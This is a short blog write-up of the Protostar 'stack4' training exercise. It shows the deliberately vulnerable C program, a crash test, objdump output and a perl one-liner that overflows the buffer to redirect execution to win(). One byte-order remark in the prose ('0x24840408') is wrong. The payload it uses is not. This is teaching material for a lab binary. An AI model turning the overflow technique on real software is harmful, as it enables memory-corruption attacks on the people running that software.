Month: June 2015

Protostar exploits stack4

On By MuttiIn ctfLeave a comment

Introduction

Protostar exploits are a cool bunch of ctf type exercises that focus on Linux  binary exploits that progressively get harder. A ISO containing the OS and challenges can be downloaded.

The website with all information and downloads is at https://exploit-exercises.com/protostar/

Challenge

Test run

user@protostar:~$ /opt/protostar/bin/stack4

Exploit

Make the program respond with the message “code flow successfully changed”.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
 printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
 char buffer[64];

 gets(buffer);
}

We can see the challenge statement will be displayed if we can change the flow of the code such that EIP can point to the memory location of win(). Changing EIP can only be accomplished after we corrupt the stack after gets(). Once gets() call is complete it will return back to the main() from where it left of but we will overwrite this with the memory location of win()

First of we have to use the same trick from previous challenges and corrupt the memory stack and using stdin to overflow the variable “buffer” which gets filled using gets().

Let’s see if we can crash the program

user@protostar:~$ perl -e 'print "A"x76'|/opt/protostar/bin/stack4
Segmentation fault

It appears that our data of A’s (0x41) was able to cause a segfault at 76 bytes.

In order to determine the memory location of win() we need to examine the program using objdump (this hint is on the protostar site).

user@protostar:~$ objdump -d /opt/protostar/bin/stack4 |grep -A 10 win
080483f4 <win>:
 80483f4: 55                   push   %ebp
 80483f5: 89 e5                mov    %esp,%ebp
 80483f7: 83 ec 18             sub    $0x18,%esp
 80483fa: c7 04 24 e0 84 04 08 movl   $0x80484e0,(%esp)
 8048401: e8 26 ff ff ff       call   804832c <puts@plt>
 8048406: c9                   leave 
 8048407: c3                   ret

After issuing objdump and greping for win() we can see the memory location is “080483f4”.

Let’s overfill the buffer and place the memory location of win() in reverse byte order with “0x24840408” at the end.

user@protostar:~$ perl -e 'print "A"x76 . "\xf4\x83\x04\x08"'|/opt/protostar/bin/stack4
code flow successfully changed
Segmentation fault

Hmm, it worked. I know I’m cutting a few corners because these first few are simple.

Thank you